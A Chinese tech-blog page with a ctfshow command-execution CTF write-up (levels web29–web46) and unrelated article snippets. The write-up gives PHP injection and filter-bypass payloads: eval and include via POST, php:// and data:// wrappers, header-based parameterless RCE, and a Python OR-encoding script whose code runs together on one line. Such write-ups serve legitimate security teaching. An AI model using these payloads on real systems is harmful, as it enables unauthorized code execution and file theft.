当前位置：首页 > news >正文

ctfshow-命令执行

news 2026/2/8 16:13:17

大佬文章

$\rm Linux$ 下空格绕过

无参数 $\rm rce$

无字符 $\rm rce$

web29

通配符：

*：匹配任意多个字符

?：匹配任意一个字符

[]：匹配某个范围的字符（ $[a d]$ 表示 $a - d$ 的字符）

{a,b}：匹配 $a$ 或者 $b$

web30

echo `cat flag`：表示先运行 cat flag，然后再把结果输出

web31

%09(tab) 绕过空格
命令拼接：c=eval($_POST[a]);，然后 POST 传入一个变量 a 即可
无参数 $\rm rce$

web32

过滤分号，用 ?> 代替
过滤括号，使用 include 函数，其不需要括号传参（例如 include a.php）

因此 ?c=include%09$_POST[a]?> ，之后 post 传入一个文件即可

文件会被注释掉（显示不出来），所以考虑伪协议读文件

a=php://filter/read=convert.base64-encode/resource=flag.php

web37

使用 php://input 协议，之后 post 传入需要的 php 代码即可

web38

data 伪协议读文件

c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg== ( $\rm base64$ 是 system("cat flag");)

web39

同web38

web40

无参数命令执行

getallheaders() 将 http 头中的信息放到一个数组里面

修改http 头中的某些不重要的内容为 system("cat flag")，使用语句 eval(array_rand(array_flip(getallheaders())));，多刷新几次即可做到无参数命令执行

web41

无数字字母 $\rm rce$

一般实现方法是自增，取反，异或，或

这题用的是或运算

# coding=gbk
import re
import requests
use = []
def get_and(aim, use):ans1 = ""ans2 = ""for i in range(len(aim)):ok = Falsefor j in range(len(use)):for k in range(j,len(use)):if (ord(use[j]) | ord(use[k])) == ord(aim[i]):ans1 = ans1 + use[j]ans2 = ans2 + use[k]ok = Trueif ok: breakif ok: break            ans = ""for i in range(len(ans1)): ans += chr(ord(ans1[i]) | ord(ans2[i]))    print(ans)return "(\""+ans1+"\"|\""+ans2+"\")"if __name__ == '__main__':match_str = "/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-"url = "http://e5280b73-c2cb-4f3f-9309-68319256efdf.challenge.ctf.show/"for i in range(256):c = chr(i)tmp = re.match(match_str, c, re.I)if tmp == None:use.append(c)func = "system"argu = "cat flag.php"data = {"c":get_and(func,use)+get_and(argu,use)}print(data)r = requests.post(url = url, data = data)print(r.text)

web42

system($c." >/dev/null 2>&1"); 黑洞代码

cat flag && ls：只会让后面的查询没有
ls #：# 是 shell 脚本的注释

web46

flag 被过滤，可以换成 f''lag

未完待续

ctfshow-命令执行

大佬文章 L i n u x \rm Linux Linux 下空格绕过无参数 r c e \rm rce rce 无字符 r c e \rm rce rce web29 通配符： *：匹配任意多个字符 ?：匹配任意一个字符 []：匹配某个范围的字符（ [ a d ] [ad] [ad] 表示 …...

编程日记 2024/1/27 0:24:30

【Python基础015】集合的用法

1、定义集合是无序可变，元素不能重复。实际上，集合底层是字典实现，集合的所有元素都是字典中的 “ 键对象”，因此是不能重复的且唯一的。 2、创建 （1）使用{}创建 a {1, 2, 3} # 集合存储整数b {1, 2,…...

编程日记 2024/1/27 0:22:28

解密神经网络：深入探究传播机制与学习过程

解密神经网络：深入探究传播机制与学习过程文章目录解密神经网络：深入探究传播机制与学习过程一、引言二、基础理论1. 人工神经元：构建块的定义2. 神经网络的结构3. 激活函数的作用三、前向传播1. 数据流动：输入到输出2. 加权和…...

编程日记 2024/1/27 0:21:26

linux usb设备网络共享 usb/ip

USB设备的网络共享可以通过USB/IP来实现， USB/IP把USB I/O信息封装成TCP/IP格式在网络端传输 ，可以实现usb的全部功能，且跨平台，是个透明的设备共享机制。一、服务端 $sudo modprobe usbip-core$sudo modprobe usbip_host$usbip…...

编程日记 2024/1/27 0:20:25

如何通过系统命令排查账号安全？

如何通过系统命令排查账号安全 query user 查看当前登录账号 logoff id 注销用户id net user 查看用户 net user username 查看用户登录情况 lusrmgr.msc 查看隐藏账号 winR打开regedit注册表找到计算机\HEKY_LOCAL_MACHINE\SAM\SAM\右键给与用户读写权限刷新打开 HKEY…...

编程日记 2024/1/27 0:19:24

《WebKit 技术内幕》学习之九（3）： JavaScript引擎

3　JavaScriptCore引擎 3.1　原理 JavaScriptCore引擎是WebKit中的默认JavaScript引擎，也是苹果在开源WebKit项目之后，开源的另外一个重要的项目。同其他很多引擎一样，在刚开始的时候它的主要部分是一个基于抽象语法树的解释器，这…...

编程日记 2024/1/27 0:18:24

IS-IS：05 ISIS开销值和协议优先级

IS-IS 协议为路由器的每个 IS-IS 接口定义并维护了一个 level-1 开销值和一个 level-2开销值。开销值可以在接口上或者全局上手动配置，也可以使用 auto-cost自动计算确定。修改接口cost： int g0/0/0 isis cost 50修改全局cost： isis cir…...

编程日记 2024/1/27 0:17:23

群辉NAS的远程访问

群辉NAS是私有云存储，局域网访问很容易【详见：网上邻居访问设置、其它设备的访问设置】，远程访问相对复杂，涉及很多关键因素，现将过程记录如下： 目录 1、互联网接入 2、绑定MAC与IP地址 3、路由器开启5…...

编程日记 2024/1/27 0:15:21

构建未来学堂：在线教育系统开发技术实践

在当今数字化时代，在线教育系统的开发越发显得至关重要。本文将带你深入了解在线教育系统的开发，涉及到关键的技术实践和代码示例。我们将采用现代化技术栈，为未来学堂的搭建提供实用的指南。技术栈选择在开始实际的开发之前&#xff0c…...

编程日记 2024/1/27 0:14:20

EMQX 单机及集群搭建

目录 1. 通过 Yum 源安装（CentOS7 单机安装） 1.1. 通过以下命令配置 EMQX Yum 源： 1.2. 运行以下命令安装 EMQX： 1.3. 运行以下命令启动 EMQX： 1.4. 访问 http://192.168.88.130:18083，默认用户名: adm…...

编程日记 2024/1/27 0:13:19

SpringMVC-对静态资源的访问

1.工程中加入静态资源在webapp下创建static文件夹，此文件夹专门放入静态资源 2.使项目可以处理静态资源的请求在SpringMVC配置文件中添加以下语句 1.引入命名空间 xmlns:mvc"http://www.springframework.org/schema/mvc" xsi:schemaLocation“http…...

编程日记 2024/1/27 0:12:18

形参和实参

目录形参（形式参数）： 实参（实际参数）： 形参和实参的区别和联系具体实例: 当我们谈论"形参"和"实参"时，可以用以下类比来解释它们之间的关系： 形参…...

编程日记 2024/1/27 0:07:14

[git] windows系统安装git教程和配置

一、何为Git Git(读音为/gɪt/)是一个开源的分布式版本控制系统，可以有效、高速地处理从很小到非常大的项目版本管理。二、git安装包有2种版本，Git for Windows Setup和Git for Windows Portable(便携版)两个版本都可以。三、Git for Windows Por…...

编程日记 2024/1/27 0:05:13

php的性能要比node.js高很多吗？

在当今的编程世界中，PHP和Node.js是两种广泛使用的服务器端编程语言。虽然它们都用于构建高效的网络应用程序，但关于它们性能的争论一直存在。有些人认为PHP的性能要比Node.js高很多，而另一些人则持相反意见。性能通常指的是计算机程序或系…...

编程日记 2024/1/27 0:03:11

[极客大挑战 2019]BabySQL1

发现union select被过滤了，双写绕过 or、from被过滤 where被过滤在b4bysql中找到flag...

编程日记 2024/1/27 0:01:09

机器视觉在OCR字符检测的应用

在产品质量检测过程中，对于字符、条码等标识信息的识别、读取、检测是非常重要的一部分，比如在食品饮料包装检测中，生产日期、保质期、生产批号、条码等字符信息是产品管理和追溯必不可缺的，因此利用机器视觉技术进行OCR字符采…...

编程日记 2024/1/27 0:00:09

讲清楚浅拷贝和深拷贝

先放出实现浅拷贝和深拷贝的一些方法(直接食用)： 1.浅拷贝： 浅拷贝在拷贝对象的时候，对于对象最外一层实现的是普通的值拷贝，对于对象里面的对象是浅拷贝，只复制地址不复制地址对应的值。 /* 方法1.1：扩…...

编程日记 2024/1/26 23:55:58

[足式机器人]Part2 Dr. CAN学习笔记- 最优控制Optimal Control Ch07

本文仅供学习使用本文参考： B站：DR_CAN Dr. CAN学习笔记 - 最优控制Optimal Control Ch07-1最优控制问题与性能指标 1. 最优控制问题与性能指标2. 动态规划 Dynamic Programming2.1 基本概念2.2 代码详解2.3 简单一维案例 3. 线性二次型调节器&#xff…...

编程日记 2024/1/26 23:53:55

RedisInsight详细安装教程

简介 RedisInsight 是一个直观高效的 Redis GUI 管理工具，它可以对 Redis 的内存、连接数、命中率以及正常运行时间进行监控，并且可以在界面上使用 CLI 和连接的 Redis 进行交互（RedisInsight 内置对 Redis 模块支持）。 RedisIn…...

编程日记 2024/1/26 23:52:54

1. NosuchMethodError org.springframework.beans.factory.support.genericBeanDefinition(xxxxx) 2. ClassNotFoundException: org.springframework.boot.SpringApplication 可能冲突的依赖是： <dependency><groupId>org.springframework.boot</g…...

编程日记 2024/1/26 23:49:51

[特殊字符] 智能合约中的数据是如何在区块链中保持一致的？

🧠 智能合约中的数据是如何在区块链中保持一致的？ 为什么所有区块链节点都能得出相同结果？合约调用这么复杂，状态真能保持一致吗？本篇带你从底层视角理解“状态一致性”的真相。一、智能合约的数据存储在哪里&#xf…...

编程新知 2025/10/25 17:23:41

MPNet：旋转机械轻量化故障诊断模型详解python代码复现

目录一、问题背景与挑战二、MPNet核心架构 2.1 多分支特征融合模块（MBFM） 2.2 残差注意力金字塔模块（RAPM） 2.2.1 空间金字塔注意力（SPA） 2.2.2 金字塔残差块（PRBlock） 2.3 分类器设计三、关键技术突破 3.1 多尺度特征融合 3.2 轻量化设计策略 3.3 抗噪声…...

编程新知 2026/2/7 5:16:28

cf2117E

原题链接：https://codeforces.com/contest/2117/problem/E 题目背景： 给定两个数组a,b，可以执行多次以下操作：选择 i (1 < i < n - 1)，并设置或，也可以在执行上述操作前执行一次删除任意和。求…...

编程新知 2026/2/4 15:29:40

如何为服务器生成TLS证书

TLS（Transport Layer Security）证书是确保网络通信安全的重要手段，它通过加密技术保护传输的数据不被窃听和篡改。在服务器上配置TLS证书，可以使用户通过HTTPS协议安全地访问您的网站。本文将详细介绍如何在服务器上生成一个TLS证…...

编程新知 2025/12/17 5:54:30

【论文阅读28】-CNN-BiLSTM-Attention-（2024）

本文把滑坡位移序列拆开、筛优质因子，再用 CNN-BiLSTM-Attention 来动态预测每个子序列，最后重构出总位移，预测效果超越传统模型。文章目录 1 引言2 方法2.1 位移时间序列加性模型2.2 变分模态分解 (VMD) 具体步骤2.3.1 样本熵（S…...

编程新知 2026/2/2 3:06:53

浪潮交换机配置track检测实现高速公路收费网络主备切换NQA

浪潮交换机track配置项目背景高速网络拓扑网络情况分析通信线路收费网络路由收费汇聚交换机相应配置收费汇聚track配置项目背景在实施省内一条高速公路时遇到的需求，本次涉及的主要是收费汇聚交换机的配置，浪潮网络设备在高速项目很少，通…...

编程新知 2026/2/6 13:10:51

QT3D学习笔记——圆台、圆锥

类名作用Qt3DWindow3D渲染窗口容器QEntity场景中的实体（对象或容器）QCamera控制观察视角QPointLight点光源QConeMesh圆锥几何网格QTransform控制实体的位置/旋转/缩放QPhongMaterialPhong光照材质（定义颜色、反光等）QFirstPersonC…...

编程新知 2026/1/29 5:26:37